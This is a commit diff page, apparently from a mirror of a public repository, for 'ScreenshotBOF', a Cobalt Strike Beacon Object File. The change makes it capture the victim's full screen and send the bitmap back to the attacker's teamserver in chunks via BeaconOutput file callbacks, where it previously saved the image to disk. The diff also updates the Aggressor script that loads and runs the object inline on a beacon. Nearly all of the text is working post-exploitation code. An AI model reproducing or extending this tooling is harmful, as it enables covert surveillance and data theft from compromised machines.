crash.software
Projects
Pull Requests
Issues
Builds
ScreenshotBOF
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY ScreenshotBOF Commits d082e142
🤬
  • ■ ■ ■ ■ ■ ■
    ScreenshotBOF/Source.cpp
    skipped 4 lines
    5 5  #pragma comment(lib, "User32.lib")
    6 6  #pragma comment(lib, "Gdi32.lib")
    7 7   
     8 +char downloadfilename[] = "screenshot.bmp";
     9 +/*Download File*/
     10 +void downloadFile(char* fileName, int downloadFileNameLength, char* returnData, int fileSize) {
    8 11   
     12 + //Intializes random number generator to create fileId
     13 + time_t t;
     14 + MSVCRT$srand((unsigned)MSVCRT$time(&t));
     15 + int fileId = MSVCRT$rand();
     16 + 
     17 + //8 bytes for fileId and fileSize
     18 + int messageLength = downloadFileNameLength + 8;
     19 + char* packedData = (char*)MSVCRT$malloc(messageLength);
     20 + 
     21 + //pack on fileId as 4-byte int first
     22 + packedData[0] = (fileId >> 24) & 0xFF;
     23 + packedData[1] = (fileId >> 16) & 0xFF;
     24 + packedData[2] = (fileId >> 8) & 0xFF;
     25 + packedData[3] = fileId & 0xFF;
     26 + 
     27 + //pack on fileSize as 4-byte int second
     28 + packedData[4] = (fileSize >> 24) & 0xFF;
     29 + packedData[5] = (fileSize >> 16) & 0xFF;
     30 + packedData[6] = (fileSize >> 8) & 0xFF;
     31 + packedData[7] = fileSize & 0xFF;
     32 + 
     33 + int packedIndex = 8;
     34 + 
     35 + //pack on the file name last
     36 + for (int i = 0; i < downloadFileNameLength; i++) {
     37 + packedData[packedIndex] = fileName[i];
     38 + packedIndex++;
     39 + }
     40 + 
     41 + BeaconOutput(CALLBACK_FILE, packedData, messageLength);
     42 + 
     43 + if (fileSize > (1024 * 900)) {
     44 + 
     45 + //Lets see how many times this constant goes into our file size, then add one (because if it doesn't go in at all, we still have one chunk)
     46 + int numOfChunks = (fileSize / (1024 * 900)) + 1;
     47 + int index = 0;
     48 + int chunkSize = 1024 * 900;
     49 + 
     50 + while (index < fileSize) {
     51 + if (fileSize - index > chunkSize) {//We have plenty of room, grab the chunk and move on
     52 + 
     53 + /*First 4 are the fileId
     54 + then account for length of file
     55 + then a byte for the good-measure null byte to be included
     56 + then lastly is the 4-byte int of the fileSize*/
     57 + int chunkLength = 4 + chunkSize;
     58 + char* packedChunk = (char*)MSVCRT$malloc(chunkLength);
     59 + 
     60 + //pack on fileId as 4-byte int first
     61 + packedChunk[0] = (fileId >> 24) & 0xFF;
     62 + packedChunk[1] = (fileId >> 16) & 0xFF;
     63 + packedChunk[2] = (fileId >> 8) & 0xFF;
     64 + packedChunk[3] = fileId & 0xFF;
     65 + 
     66 + int chunkIndex = 4;
     67 + 
     68 + //pack on the file name last
     69 + for (int i = index; i < index + chunkSize; i++) {
     70 + packedChunk[chunkIndex] = returnData[i];
     71 + chunkIndex++;
     72 + }
     73 + 
     74 + BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength);
     75 + 
     76 + }
     77 + else {//This chunk is smaller than the chunkSize, so we have to be careful with our measurements
     78 + 
     79 + int lastChunkLength = fileSize - index + 4;
     80 + char* lastChunk = (char*)MSVCRT$malloc(lastChunkLength);
     81 + 
     82 + //pack on fileId as 4-byte int first
     83 + lastChunk[0] = (fileId >> 24) & 0xFF;
     84 + lastChunk[1] = (fileId >> 16) & 0xFF;
     85 + lastChunk[2] = (fileId >> 8) & 0xFF;
     86 + lastChunk[3] = fileId & 0xFF;
     87 + int lastChunkIndex = 4;
     88 + 
     89 + //pack on the file name last
     90 + for (int i = index; i < fileSize; i++) {
     91 + lastChunk[lastChunkIndex] = returnData[i];
     92 + lastChunkIndex++;
     93 + }
     94 + BeaconOutput(CALLBACK_FILE_WRITE, lastChunk, lastChunkLength);
     95 + }
     96 + 
     97 + index = index + chunkSize;
     98 + 
     99 + }
     100 + 
     101 + }
     102 + else {
     103 + 
     104 + /*first 4 are the fileId
     105 + then account for length of file
     106 + then a byte for the good-measure null byte to be included
     107 + then lastly is the 4-byte int of the fileSize*/
     108 + int chunkLength = 4 + fileSize;
     109 + char* packedChunk = (char*)MSVCRT$malloc(chunkLength);
     110 + 
     111 + //pack on fileId as 4-byte int first
     112 + packedChunk[0] = (fileId >> 24) & 0xFF;
     113 + packedChunk[1] = (fileId >> 16) & 0xFF;
     114 + packedChunk[2] = (fileId >> 8) & 0xFF;
     115 + packedChunk[3] = fileId & 0xFF;
     116 + int chunkIndex = 4;
     117 + 
     118 + //pack on the file name last
     119 + for (int i = 0; i < fileSize; i++) {
     120 + packedChunk[chunkIndex] = returnData[i];
     121 + chunkIndex++;
     122 + }
     123 + 
     124 + BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength);
     125 + }
     126 + 
     127 + 
     128 + //We need to tell the teamserver that we are done writing to this fileId
     129 + char packedClose[4];
     130 + 
     131 + //pack on fileId as 4-byte int first
     132 + packedClose[0] = (fileId >> 24) & 0xFF;
     133 + packedClose[1] = (fileId >> 16) & 0xFF;
     134 + packedClose[2] = (fileId >> 8) & 0xFF;
     135 + packedClose[3] = fileId & 0xFF;
     136 + BeaconOutput(CALLBACK_FILE_CLOSE, packedClose, 4);
     137 + 
     138 + return;
     139 +}
    9 140   
    10 141  #pragma region error_handling
    11 142  #define print_error(msg, hr) _print_error(__FUNCTION__, __LINE__, msg, hr)
    skipped 68 lines
    80 211   ReleaseDC(NULL, hDC);
    81 212   }
    82 213   
    83  - fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,
    84  - FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL);
     214 + //fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL);
    85 215   
    86  - if (fh == INVALID_HANDLE_VALUE)
    87  - return FALSE;
     216 + //if (fh == INVALID_HANDLE_VALUE)
     217 + // return FALSE;
    88 218   
    89 219   bmfHdr.bfType = 0x4D42; // "BM"
    90 220   dwDIBSize = sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + dwPaletteSize + dwBmBitsSize;
    skipped 1 lines
    92 222   bmfHdr.bfReserved1 = 0;
    93 223   bmfHdr.bfReserved2 = 0;
    94 224   bmfHdr.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER) + dwPaletteSize;
     225 + void* bmpdata = malloc(sizeof(BITMAPFILEHEADER) + dwDIBSize);
     226 + memcpy(bmpdata, &bmfHdr, sizeof(BITMAPFILEHEADER));
     227 + memcpy(((char*)bmpdata) + sizeof(BITMAPFILEHEADER), lpbi, dwDIBSize);
    95 228   
    96  - WriteFile(fh, (LPSTR)&bmfHdr, sizeof(BITMAPFILEHEADER), &dwWritten, NULL);
    97 229   
    98  - WriteFile(fh, (LPSTR)lpbi, dwDIBSize, &dwWritten, NULL);
     230 + downloadFile((char*)lpszFileName, sizeof(lpszFileName), (char*)bmpdata, (int)(sizeof(BITMAPFILEHEADER) + dwDIBSize));
     231 + //WriteFile(fh, (LPSTR)bmpdata, sizeof(BITMAPFILEHEADER)+ dwDIBSize, &dwWritten, NULL);
     232 + 
     233 + /* clean up */
    99 234   GlobalUnlock(hDib);
    100 235   GlobalFree(hDib);
    101  - CloseHandle(fh);
     236 + //CloseHandle(fh);
    102 237   return TRUE;
    103 238  }
    104 239   
    105 240  #ifdef BOF
    106 241  void go(char* buff, int len) {
    107  - BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to disk");
     242 + datap parser;
     243 + char * downloadfilename;
     244 + BeaconDataParse(&parser, buff, len);
     245 + downloadfilename = BeaconDataExtract(&parser, NULL);
     246 + BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to %s",downloadfilename);
    108 247   int x1, y1, x2, y2, w, h;
    109 248   // get screen dimensions
    110 249   x1 = GetSystemMetrics(SM_XVIRTUALSCREEN);
    skipped 21 lines
    132 271   */
    133 272  
    134 273   BeaconPrintf(0x0, "[+] PrintScreen saved to bitmap...");
    135  - LPCSTR filename = "screenshot.bmp";
     274 + LPCSTR filename = (LPCSTR)downloadfilename;
    136 275   SaveHBITMAPToFile(hBitmap, (LPCTSTR)filename);
    137 276   
    138  - BeaconPrintf(0x0, "[+] Printscreen bitmap saved to screenshot.bmp");
     277 + //BeaconPrintf(0x0, "[+] Printscreen bitmap saved to %s",downloadfilename);
    139 278   // clean up
    140 279   SelectObject(hDC, old_obj);
    141 280   DeleteDC(hDC);
    skipped 12 lines
  • ■ ■ ■ ■ ■ ■
    ScreenshotBOF/beacon.h
    skipped 43 lines
    44 44  #define CALLBACK_OUTPUT_OEM 0x1e
    45 45  #define CALLBACK_ERROR 0x0d
    46 46  #define CALLBACK_OUTPUT_UTF8 0x20
     47 +#define CALLBACK_FILE 0x02
     48 +#define CALLBACK_FILE_WRITE 0x08
     49 +#define CALLBACK_FILE_CLOSE 0x09
    47 50   
    48 51  DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...);
    49 52  DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len);
    skipped 15 lines
  • ■ ■ ■ ■ ■ ■
    ScreenshotBOF/bofdefs.h
    skipped 162 lines
    163 163  DECLSPEC_IMPORT BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID);
    164 164  DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes);
    165 165  DECLSPEC_IMPORT void* __cdecl MSVCRT$memcpy(LPVOID, LPVOID, size_t);
     166 +DECLSPEC_IMPORT void* __cdecl MSVCRT$malloc(size_t);
    166 167  DECLSPEC_IMPORT void __cdecl MSVCRT$memset(void*, int, size_t);
    167 168   
    168 169   
    skipped 97 lines
    266 267  #define HeapAlloc KERNEL32$HeapAlloc
    267 268  #define HeapReAlloc KERNEL32$HeapReAlloc
    268 269  #define memcpy MSVCRT$memcpy
     270 +#define malloc MSVCRT$malloc
    269 271  #define memset MSVCRT$memset
    270 272   
    271 273   
    skipped 91 lines
  • ■ ■ ■ ■ ■
    ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log
    skipped 12 lines
    13 13  C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once
    14 14  C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once
    15 15  C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once
    16  -C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(246): warning C4005: 'ZeroMemory': macro redefinition
     16 +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(247): warning C4005: 'ZeroMemory': macro redefinition
    17 17   C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory'
     18 +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(270): warning C4005: 'malloc': macro redefinition
     19 + C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(245): note: see previous definition of 'malloc'
    18 20   C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x64\source.obj
    19 21   1 File(s) copied
    20 22   enumerating sections...
    skipped 4 lines
  • ScreenshotBOF/intermediary/BOF/x64/source.obj
    Binary file.
  • ■ ■ ■ ■ ■
    ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.log
    skipped 12 lines
    13 13  C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once
    14 14  C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once
    15 15  C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once
    16  -C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(246): warning C4005: 'ZeroMemory': macro redefinition
     16 +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(247): warning C4005: 'ZeroMemory': macro redefinition
    17 17   C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory'
     18 +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(270): warning C4005: 'malloc': macro redefinition
     19 + C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(245): note: see previous definition of 'malloc'
    18 20   C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x86\source.obj
    19 21   1 File(s) copied
    20 22   enumerating sections...
    skipped 4 lines
  • ScreenshotBOF/intermediary/BOF/x86/source.obj
    Binary file.
  • bin/BOF/ScreenshotBOF.x64.obj
    Binary file.
  • bin/BOF/ScreenshotBOF.x86.obj
    Binary file.
  • ■ ■ ■ ■ ■
    bin/BOF/screenshotBOF.cna
    skipped 10 lines
    11 11   # figure out the arch of this session
    12 12   $barch = barch($1);
    13 13   # read in the right BOF file
    14  - $handle = openf(script_resource("screenshotBOF. $+ $barch $+ .obj"));
     14 + $handle = openf(script_resource("ScreenshotBOF. $+ $barch $+ .obj"));
    15 15   $data = readb($handle, -1);
    16 16   closef($handle);
     17 +
     18 + $args = bof_pack($1, "z",$2);
     19 +
    17 20   # announce what we're doing
    18 21   btask($1, "Running screenshot BOF by (@codex_tf2)");
    19 22   # execute it.
    20 23   beacon_inline_execute($1, $data, "go", $args);
    21 24  }
     25 + 
  • bin/screenshotBOF.zip
    Binary file.
Please wait...
Page is in error, reload to recover